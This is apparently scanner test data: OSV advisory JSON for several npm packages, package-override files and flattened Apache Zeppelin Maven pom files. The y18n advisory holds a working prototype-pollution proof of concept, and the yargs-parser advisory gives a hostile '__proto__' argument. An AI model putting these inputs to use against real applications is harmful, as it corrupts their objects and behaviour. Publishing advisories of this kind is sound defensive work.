"SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.2.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-6fc8-4gx4-v693/GHSA-6fc8-4gx4-v693.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-6fc8-4gx4-v693/GHSA-6fc8-4gx4-v693.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32640" }, { "type": 
"WEB", "url": "https://github.com/websockets/ws/issues/1895" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff" }, { "type": "PACKAGE", "url": "https://github.com/websockets/ws" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdfa7b6253c4d6271e31566ecd5f30b7ce1b8fb2c89d52b8c4e0f4e30@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210706-0005" } ], "database_specific": { "cwe_ids": [ "CWE-345", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-28T18:18:04Z", "nvd_published_at": "2021-05-25T19:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h4j5-c7cj-74xg", "published": "2021-05-04T18:02:34Z", "modified": "2025-01-14T08:57:22.719908Z", "aliases": [ "CVE-2020-28502" ], "summary": "xmlhttprequest and xmlhttprequest-ssl vulnerable to Arbitrary Code Injection", "details": "This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. 
Provided requests are sent synchronously (`async=False` on `xhr.open`), malicious user input flowing into `xhr.send` could result in arbitrary code being injected and run.", "affected": [ { "package": { "name": "xmlhttprequest", "ecosystem": "npm", "purl": "pkg:npm/xmlhttprequest" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-h4j5-c7cj-74xg/GHSA-h4j5-c7cj-74xg.json" } }, { "package": { "name": "xmlhttprequest-ssl", "ecosystem": "npm", "purl": "pkg:npm/xmlhttprequest-ssl" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.6.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-h4j5-c7cj-74xg/GHSA-h4j5-c7cj-74xg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28502" }, { "type": "WEB", "url": "https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6" }, { "type": "WEB", "url": "https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291" }, { "type": "WEB", "url": "https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480" }, { "type": "WEB", "url": "https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js%23L480" }, { "type": "WEB", "url": "https://github.com/mjwwit/node-XMLHttpRequest/blob/ae38832a0f1347c5e96dda665402509a3458e302/lib/XMLHttpRequest.js#L531" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082937" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082938" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUESTSSL-1082936" } ], 
"database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T20:34:02Z", "nvd_published_at": "2021-03-05T18:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c4w7-xm78-47vh", "published": "2021-03-29T16:05:12Z", "modified": "2024-12-05T15:28:53.812442Z", "aliases": [ "CVE-2020-7774" ], "summary": "Prototype Pollution in y18n", "details": "### Overview\n\nThe npm package `y18n` before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution. \n\n### POC\n\n```js\nconst y18n = require('y18n')();\n\ny18n.setLocale('__proto__');\ny18n.updateLocale({polluted: true});\n\nconsole.log(polluted); // true\n```\n\n### Recommendation\n\nUpgrade to version 3.2.2, 4.0.1, 5.0.5 or later.", "affected": [ { "package": { "name": "y18n", "ecosystem": "npm", "purl": "pkg:npm/y18n" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.2.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-c4w7-xm78-47vh/GHSA-c4w7-xm78-47vh.json" } }, { "package": { "name": "y18n", "ecosystem": "npm", "purl": "pkg:npm/y18n" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.1" } ] } ], "versions": [ "4.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-c4w7-xm78-47vh/GHSA-c4w7-xm78-47vh.json" } }, { "package": { "name": "y18n", "ecosystem": "npm", "purl": "pkg:npm/y18n" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.0.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-c4w7-xm78-47vh/GHSA-c4w7-xm78-47vh.json" } } ], "references": [ { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2020-7774" }, { "type": "WEB", "url": "https://github.com/yargs/y18n/issues/96" }, { "type": "WEB", "url": "https://github.com/yargs/y18n/pull/108" }, { "type": "WEB", "url": "https://github.com/yargs/y18n/commit/90401eea9062ad498f4f792e3fff8008c4c193a3" }, { "type": "WEB", "url": "https://github.com/yargs/y18n/commit/a9ac604abf756dec9687be3843e2c93bfe581f25" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf" }, { "type": "PACKAGE", "url": "https://github.com/yargs/y18n" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-20", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2021-03-12T21:23:11Z", "nvd_published_at": "2020-11-17T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p9pc-299p-vxgp", "published": "2020-09-04T18:00:54Z", "modified": "2025-01-14T08:57:10.212240Z", "aliases": [ "CVE-2020-7608" ], "summary": "yargs-parser Vulnerable to Prototype Pollution", "details": "Affected versions of `yargs-parser` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. \nParsing the argument `--foo.__proto__.bar baz'` adds a `bar` property with value `baz` to all objects. 
This is only exploitable if attackers have control over the arguments being passed to `yargs-parser`.\n\n\n\n## Recommendation\n\nUpgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.", "affected": [ { "package": { "name": "yargs-parser", "ecosystem": "npm", "purl": "pkg:npm/yargs-parser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "13.1.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-p9pc-299p-vxgp/GHSA-p9pc-299p-vxgp.json" } }, { "package": { "name": "yargs-parser", "ecosystem": "npm", "purl": "pkg:npm/yargs-parser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "14.0.0" }, { "fixed": "15.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-p9pc-299p-vxgp/GHSA-p9pc-299p-vxgp.json" } }, { "package": { "name": "yargs-parser", "ecosystem": "npm", "purl": "pkg:npm/yargs-parser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "16.0.0" }, { "fixed": "18.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-p9pc-299p-vxgp/GHSA-p9pc-299p-vxgp.json" } }, { "package": { "name": "yargs-parser", "ecosystem": "npm", "purl": "pkg:npm/yargs-parser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.0.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-p9pc-299p-vxgp/GHSA-p9pc-299p-vxgp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7608" }, { "type": "WEB", "url": "https://github.com/yargs/yargs-parser/commit/1c417bd0b42b09c475ee881e36d292af4fa2cc36" }, { "type": "WEB", "url": 
"https://github.com/yargs/yargs-parser/commit/63810ca1ae1a24b08293a4d971e70e058c7a41e2" }, { "type": "PACKAGE", "url": "https://github.com/yargs/yargs-parser" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-YARGSPARSER-560381" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1500" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T19:01:32Z", "nvd_published_at": "2020-03-16T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ] } ] } ================================================ FILE: internal/remediation/testdata/zeppelin-server/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/zeppelin-server/parent/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/zeppelin-server/parent/parent/pom.xml ================================================ 4.0.0 org.apache apache 28 pom The Apache Software Foundation The Apache Software Foundation provides support for the Apache community of open-source software projects. The Apache projects are characterized by a collaborative, consensus based development process, an open and pragmatic software license, and a desire to create high quality software that leads the way in its field. We consider ourselves not simply a group of projects sharing a server, but rather a community of developers and users. 
https://www.apache.org/ The Apache Software Foundation https://www.apache.org/ Apache License, Version 2.0 https://www.apache.org/licenses/LICENSE-2.0.txt repo Apache Announce List announce-subscribe@apache.org announce-unsubscribe@apache.org announce@apache.org https://mail-archives.apache.org/mod_mbox/www-announce/ scm:git:https://gitbox.apache.org/repos/asf/maven-apache-parent.git scm:git:https://gitbox.apache.org/repos/asf/maven-apache-parent.git https://github.com/apache/maven-apache-parent/tree/${project.scm.tag} apache-28 apache.releases.https ${distMgmtReleasesName} ${distMgmtReleasesUrl} apache.snapshots.https ${distMgmtSnapshotsName} ${distMgmtSnapshotsUrl} Apache Release Distribution Repository https://repository.apache.org/service/local/staging/deploy/maven2 Apache Development Snapshot Repository https://repository.apache.org/content/repositories/snapshots https://www.apache.org/images/asf_logo_wide_2016.png UTF-8 UTF-8 source-release true 3.2.5 1.8 ${maven.compiler.target} 1.7 2.22.2 3.7.0 posix 2022-11-14T22:50:41Z org.apache.maven.plugin-tools maven-plugin-annotations ${maven.plugin.tools.version} apache.snapshots Apache Snapshot Repository https://repository.apache.org/snapshots false apache.snapshots Apache Snapshot Repository https://repository.apache.org/snapshots false org.apache.maven.plugins maven-antrun-plugin 3.1.0 org.apache.maven.plugins maven-assembly-plugin 3.4.2 org.apache.maven.plugins maven-clean-plugin 3.2.0 org.apache.maven.plugins maven-compiler-plugin 3.10.1 org.apache.maven.plugins maven-dependency-plugin 3.3.0 org.apache.maven.plugins maven-deploy-plugin 2.8.2 org.apache.maven.plugins maven-ear-plugin 3.2.0 org.apache.maven.plugins maven-enforcer-plugin 3.1.0 org.apache.maven.plugins maven-failsafe-plugin ${surefire.version} org.apache.maven.plugins maven-gpg-plugin 3.0.1 --digest-algo=SHA512 org.apache.maven.plugins maven-help-plugin 3.3.0 org.apache.maven.plugins maven-install-plugin 3.0.1 org.apache.maven.plugins 
maven-invoker-plugin 3.3.0 org.apache.maven.plugins maven-jar-plugin 3.3.0 true true org.apache.maven.plugins maven-javadoc-plugin 3.4.1 true org.apache.maven.plugins maven-plugin-plugin ${maven.plugin.tools.version} org.apache.maven.plugins maven-plugin-report-plugin ${maven.plugin.tools.version} org.apache.maven.plugins maven-project-info-reports-plugin 3.4.1 org.eclipse.m2e:lifecycle-mapping org.apache.maven.plugins maven-release-plugin 3.0.0-M6 false deploy apache-release org.apache.maven.plugins maven-remote-resources-plugin 1.7.0 org.apache.maven.plugins maven-resources-plugin 3.3.0 org.apache.maven.plugins maven-scm-plugin 1.13.0 org.apache.maven.plugins maven-scm-publish-plugin 3.1.0 org.apache.maven.plugins maven-site-plugin 3.12.1 org.apache.maven.plugins maven-source-plugin 3.2.1 org.apache.maven.plugins maven-surefire-plugin ${surefire.version} org.apache.maven.plugins maven-surefire-report-plugin ${surefire.version} org.apache.maven.plugins maven-war-plugin 3.3.2 org.apache.maven.plugins maven-shade-plugin 3.4.1 org.apache.rat apache-rat-plugin 0.15 org.apache.maven.plugins maven-remote-resources-plugin process-resource-bundles process org.apache:apache-jar-resource-bundle:1.4 org.apache.maven.plugins maven-enforcer-plugin enforce-maven-version enforce ${minimalMavenBuildVersion} enforce-java-version enforce ${minimalJavaBuildVersion} org.apache.maven.plugins maven-site-plugin attach-descriptor attach-descriptor apache-release org.apache.maven.plugins maven-assembly-plugin org.apache.apache.resources apache-source-release-assembly-descriptor 1.0.6 source-release-assembly package single true ${sourceReleaseAssemblyDescriptor} ${assembly.tarLongFileMode} true org.apache.maven.plugins maven-deploy-plugin true org.apache.maven.plugins maven-source-plugin attach-sources jar-no-fork org.apache.maven.plugins maven-javadoc-plugin attach-javadocs jar net.nicoulaj.maven.plugins checksum-maven-plugin 1.11 source-release-checksum artifacts post-integration-test 
SHA-512 source-release true false true org.apache.maven.plugins maven-gpg-plugin sign-release-artifacts sign only-eclipse m2e.version org.eclipse.m2e lifecycle-mapping 1.0.0 org.apache.maven.plugins maven-remote-resources-plugin [0,1.8.0) process ================================================ FILE: internal/remediation/testdata/zeppelin-server/parent/pom.xml ================================================ 4.0.0 org.apache.zeppelin zeppelin pom 0.11.1 Zeppelin Zeppelin project https://zeppelin.apache.org org.apache apache 28 ./parent The Apache Software License, Version 2.0 https://www.apache.org/licenses/LICENSE-2.0.txt repo https://git-wip-us.apache.org/repos/asf/zeppelin.git scm:git:https://git-wip-us.apache.org/repos/asf/zeppelin.git scm:git:https://git-wip-us.apache.org/repos/asf/zeppelin.git 2013 build-tools zeppelin-interpreter-parent zeppelin-interpreter zeppelin-interpreter-shaded zeppelin-zengine rlang zeppelin-jupyter-interpreter zeppelin-jupyter-interpreter-shaded groovy spark spark-submit submarine markdown mongodb angular shell livy hbase jdbc file flink flink-cmd influxdb python cassandra elasticsearch bigquery alluxio neo4j java sparql zeppelin-common zeppelin-client zeppelin-client-examples zeppelin-web zeppelin-server zeppelin-jupyter zeppelin-plugins zeppelin-distribution UTF-8 1.8 ${java.version} ${java.version} ${scala.2.11.version} 2.11 2.11.12 2.12.17 3.2.15 1.17.0 v16.20.2 8.19.4 1.12.1 1.7.35 1.2.25 0.13.0 0.62.2 2.8.9 0.2.2 20240205 9.4.52.v20230823 4.4.1 4.5.13 4.0.2 1.21 3.12.0 1.10.0 2.8.0 1.3 1.14 2.7 3.2.2 1.4 1.10.0 1.70 3.6.3 4.1.14 1.6.0 2.7.7 3.0.3 3.1.3 3.2.4 3.3.6 ${hadoop2.7.version} provided hadoop-client hadoop-yarn-api hadoop-client 2.3.2 1.5.4 1.16.1 3.21.7 1.51.0 2.14.0 5.7.1 3.12.4 1.7.0 4.2.0 1.8 3.2.0 1.7.7 1.7 1.4 2.17 3.1.0 2.7 3.8.1 3.1.2 2.8.2 1.6.0 3.0.0-M3 1.6.0 2.17 4.0.0 1.6 3.2.0 3.2.0 1.0.0 3.11.4 0.13 3.1.0 1.4 4.6.3 2.15.2 1.7.1 2.0.0 1.11.2 3.2.1 2.22.2 1.4.1.Final 1.19.0 512m com.vladsch.flexmark 
flexmark-all ${flexmark.all.version} commons-logging commons-logging org.slf4j slf4j-api ${slf4j.version} org.slf4j slf4j-reload4j ${slf4j.version} ch.qos.reload4j reload4j ch.qos.reload4j reload4j ${reload4j.version} org.slf4j jcl-over-slf4j ${slf4j.version} org.apache.thrift libthrift ${libthrift.version} javax.annotation javax.annotation-api org.apache.httpcomponents httpcore ${httpcomponents.core.version} org.apache.httpcomponents httpclient ${httpcomponents.client.version} commons-logging commons-logging org.apache.httpcomponents httpasyncclient ${httpcomponents.asyncclient.version} commons-logging commons-logging org.apache.commons commons-lang3 ${commons.lang3.version} org.apache.commons commons-text ${commons.text.version} org.apache.commons commons-exec ${commons.exec.version} com.google.code.gson gson ${gson.version} org.json json ${org-json.version} org.danilopianini gson-extras ${gson-extras.version} org.apache.commons commons-configuration2 ${commons.configuration2.version} commons-lang commons-lang 2.6 commons-codec commons-codec ${commons.codec.version} commons-io commons-io ${commons.io.version} commons-collections commons-collections ${commons.collections.version} commons-cli commons-cli ${commons.cli.version} org.apache.shiro shiro-core ${shiro.version} org.apache.shiro shiro-web ${shiro.version} org.apache.shiro shiro-config-core ${shiro.version} org.bouncycastle bcpkix-jdk15on ${bouncycastle.version} org.codehaus.jettison jettison ${jettison.version} org.apache.hadoop ${hadoop-client-api.artifact} ${hadoop.version} ${hadoop.deps.scope} org.apache.zookeeper zookeeper org.apache.hadoop hadoop-common com.sun.jersey jersey-core com.sun.jersey jersey-json com.sun.jersey jersey-client com.sun.jersey jersey-server javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty io.netty netty-all commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons 
commons-compress xml-apis xml-apis xerces xercesImpl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons commons-math3 com.fasterxml.jackson.core jackson-annotations com.nimbusds nimbus-jose-jwt org.eclipse.jetty jetty-xml org.eclipse.jetty jetty-servlet org.eclipse.jetty jetty-util commons-beanutils commons-beanutils org.apache.commons commons-configuration2 commons-beanutils commons-beanutils-core org.eclipse.jetty jetty-webapp com.fasterxml.jackson.module jackson-module-jaxb-annotations com.fasterxml.jackson.core jackson-core com.fasterxml.jackson.core jackson-databind commons-logging commons-logging org.apache.hadoop hadoop-yarn-common ${hadoop.version} ${hadoop.deps.scope} asm asm org.ow2.asm asm org.jboss.netty netty javax.servlet servlet-api commons-logging commons-logging com.sun.jersey * com.sun.jersey.jersey-test-framework * com.sun.jersey.contribs * com.google.guava guava org.apache.commons commons-compress org.apache.hadoop hadoop-yarn-client ${hadoop.version} ${hadoop.deps.scope} javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-mapper-asl org.codehaus.jackson jackson-core-asl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons commons-math3 commons-logging commons-logging log4j log4j org.apache.hadoop hadoop-yarn-api ${hadoop.version} ${hadoop.deps.scope} javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-mapper-asl org.codehaus.jackson jackson-core-asl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons 
commons-math3 commons-logging commons-logging org.apache.hadoop hadoop-yarn-server-tests ${hadoop.version} tests test org.apache.hadoop hadoop-yarn-common com.sun.jersey jersey-core com.sun.jersey jersey-client com.sun.jersey jersey-server javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-core-asl org.codehaus.jackson jackson-jaxrs org.codehaus.jackson jackson-xc org.codehaus.jackson jackson-mapper-asl com.google.guava guava javax.xml.bind jaxb-api com.fasterxml.jackson.core jackson-core org.eclipse.jetty jetty-util com.zaxxer HikariCP-java7 com.fasterxml.jackson.core jackson-annotations com.fasterxml.jackson.module jackson-module-jaxb-annotations commons-logging commons-logging io.dropwizard.metrics metrics-core com.google.guava guava com.fasterxml.jackson.core jackson-databind org.apache.hadoop hadoop-common ${hadoop.version} ${hadoop.deps.scope} com.sun.jersey jersey-core com.sun.jersey jersey-json com.sun.jersey jersey-client com.sun.jersey jersey-server javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-mapper-asl org.codehaus.jackson jackson-core-asl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons commons-math3 commons-beanutils commons-beanutils commons-beanutils commons-beanutils-core org.apache.commons commons-configuration2 org.apache.zookeeper zookeeper org.eclipse.jetty jetty-servlet org.eclipse.jetty jetty-util org.eclipse.jetty jetty-webapp org.eclipse.jetty jetty-server com.nimbusds nimbus-jose-jwt com.fasterxml.jackson.core jackson-databind 
commons-logging commons-logging org.ow2.asm asm com.jamesmurty.utils java-xmlbuilder org.apache.hadoop hadoop-common ${hadoop.version} tests test com.sun.jersey jersey-core com.sun.jersey jersey-json com.sun.jersey jersey-client com.sun.jersey jersey-server javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-mapper-asl org.codehaus.jackson jackson-core-asl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons commons-math3 commons-beanutils commons-beanutils org.apache.commons commons-configuration2 org.apache.zookeeper zookeeper org.eclipse.jetty jetty-servlet org.eclipse.jetty jetty-util org.eclipse.jetty jetty-webapp org.eclipse.jetty jetty-server com.nimbusds nimbus-jose-jwt com.fasterxml.jackson.core jackson-databind commons-logging commons-logging log4j log4j org.slf4j slf4j-log4j12 org.ow2.asm asm org.junit.jupiter junit-jupiter-engine ${junit.jupiter.version} test org.junit.jupiter junit-jupiter-params ${junit.jupiter.version} test org.assertj assertj-core ${assertj.version} test org.mockito mockito-core ${mockito.version} test org.testcontainers testcontainers ${testcontainers.version} test org.awaitility awaitility ${awaitility.version} test org.testcontainers neo4j ${testcontainers.version} test org.testcontainers junit-jupiter ${testcontainers.version} test org.apache.hadoop hadoop-hdfs ${hadoop.version} test com.sun.jersey jersey-json com.sun.jersey jersey-client javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl com.google.guava guava io.netty netty-all org.eclipse.jetty jetty-util 
com.fasterxml.jackson.core jackson-annotations commons-logging commons-logging com.fasterxml.jackson.core jackson-databind org.apache.hadoop hadoop-hdfs ${hadoop.version} tests test com.sun.jersey jersey-json com.sun.jersey jersey-client javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl com.google.guava guava io.netty netty-all org.eclipse.jetty jetty-util com.fasterxml.jackson.core jackson-annotations commons-logging commons-logging log4j log4j com.fasterxml.jackson.core jackson-databind org.apache.hadoop ${hadoop-client-runtime.artifact} ${hadoop.version} ${hadoop.deps.scope} commons-logging commons-logging com.google.code.findbugs jsr305 org.apache.hadoop ${hadoop-client-minicluster.artifact} ${hadoop.version} test org.apache.maven.plugins maven-compiler-plugin ${java.version} ${java.version} org.apache.maven.plugins maven-jar-plugin true lib/ theMainClass org.apache.maven.plugins maven-scm-plugin developerConnection branch-0.1 branch org.apache.maven.plugins maven-enforcer-plugin enforce-dependency-convergence true enforce org.apache.maven.plugins maven-deploy-plugin org.apache.maven.plugins maven-jar-plugin ${plugin.jar.version} org.apache.maven.plugins maven-scm-plugin ${plugin.scm.version} pl.project13.maven git-commit-id-plugin ${plugin.git.commit.id.version} org.apache.maven.plugins maven-enforcer-plugin ${plugin.enforcer.version} org.apache.maven.plugins maven-deploy-plugin ${plugin.deploy.version} org.apache.maven.plugins maven-checkstyle-plugin ${plugin.checkstyle.version} true ${basedir}/src/main/java,${basedir}/src/main/scala ${basedir}/src/test/java zeppelin/checkstyle.xml checkstyle-fail-build check true org/apache/zeppelin/interpreter/thrift/*,org/apache/zeppelin/python/proto/* org.apache.zeppelin build-tools ${project.version} 
org.apache.maven.plugins maven-clean-plugin ${plugin.clean.version} net.alchim31.maven scala-maven-plugin ${plugin.scala.alchim31.version} all -unchecked -deprecation -feature org.apache.maven.plugins maven-surefire-plugin ${plugin.surefire.version} -Xmx2g -Xms1g -Dfile.encoding=UTF-8 true ${tests.to.exclude} org.apache.maven.plugins maven-assembly-plugin ${plugin.assembly.version} org.codehaus.mojo exec-maven-plugin ${plugin.exec.version} org.codehaus.mojo cobertura-maven-plugin ${plugin.cobertura.version} com.googlecode.maven-download-plugin download-maven-plugin ${plugin.download.version} org.apache.maven.plugins maven-antrun-plugin ${plugin.antrun.version} org.apache.maven.plugins maven-dependency-plugin ${plugin.dependency.version} copy-dependencies process-test-resources copy-dependencies ${project.build.directory}/lib false false true runtime org.scalatest scalatest-maven-plugin ${plugin.scalatest.version} org.codehaus.mojo build-helper-maven-plugin ${plugin.buildhelper.version} com.github.eirslett frontend-maven-plugin ${plugin.frontend.version} org.apache.maven.plugins maven-failsafe-plugin ${plugin.failsafe.version} com.github.os72 protoc-jar-maven-plugin ${plugin.protobuf.version} com.bazaarvoice.maven.plugins s3-upload-maven-plugin ${plugin.s3.upload.version} org.codehaus.mojo buildnumber-maven-plugin ${plugin.buildnumber.version} org.apache.avro avro-maven-plugin ${plugin.avro.version} org.scalatra.scalate maven-scalate-plugin_${scala.binary.version} ${plugin.scalate.version} org.apache.maven.plugins maven-source-plugin ${plugin.source.version} org.apache.maven.plugins maven-javadoc-plugin ${plugin.javadoc.version} org.apache.maven.plugins maven-gpg-plugin ${plugin.gpg.version} org.apache.rat apache-rat-plugin ${plugin.rat.version} web-angular zeppelin-web-angular vendor-repo cloudera https://repository.cloudera.com/artifactory/cloudera-repos/ hortonworks https://repo.hortonworks.com/content/groups/public/ integration zeppelin-integration 
zeppelin-interpreter-integration examples zeppelin-examples helium-dev helium-dev include-hadoop compile build-distr false org.apache.maven.plugins maven-surefire-plugin true org.apache.maven.plugins maven-assembly-plugin make-assembly package single publish-distr org.apache.maven.plugins maven-surefire-plugin true org.apache.maven.plugins maven-source-plugin attach-sources jar org.apache.maven.plugins maven-javadoc-plugin attach-javadocs jar release-sign-artifacts performRelease true org.apache.maven.plugins maven-gpg-plugin sign-artifacts verify sign rat org.apache.rat apache-rat-plugin **/*.keywords reports/** **/.idea/ **/*.iml .git/ .github/ .gitignore git.properties .repository/ .rat-excludes/ .Rhistory **/*.diff **/*.patch **/*.avsc **/*.avro **/*.log **/*.ipynb **/test/resources/** **/.settings/* **/.factorypath **/.classpath **/.project **/target/** **/derby.log **/metastore_db/ **/logs/** **/run/** interpreter/** **/local-repo/** **/null/** **/notebook/** **/README.md DEPENDENCIES DEPLOY.md STYLE.md Roadmap.md **/licenses/** **/zeppelin-distribution/src/bin_license/** conf/interpreter.json conf/notebook-authorization.json conf/credentials.json conf/zeppelin-env.sh conf/helium.json spark-*-bin*/** .spark-dist/** **/interpreter-setting.json **/constants.json scripts/** **/**/*.log **/**/logs/** **/test/karma.conf.js **/test/spec/** **/.babelrc **/.bowerrc .editorconfig .eslintrc protractor.conf.js **/.tmp/** **/target/** **/node/** **/node_modules/** **/bower_components/** **/dist/** **/.buildignore **/.npmignore **/.jshintrc **/yarn.lock **/bower.json **/src/fonts/Patua-One* **/src/fonts/patua-one* **/src/fonts/Roboto* **/src/fonts/roboto* **/src/fonts/fontawesome* **/src/fonts/font-awesome* 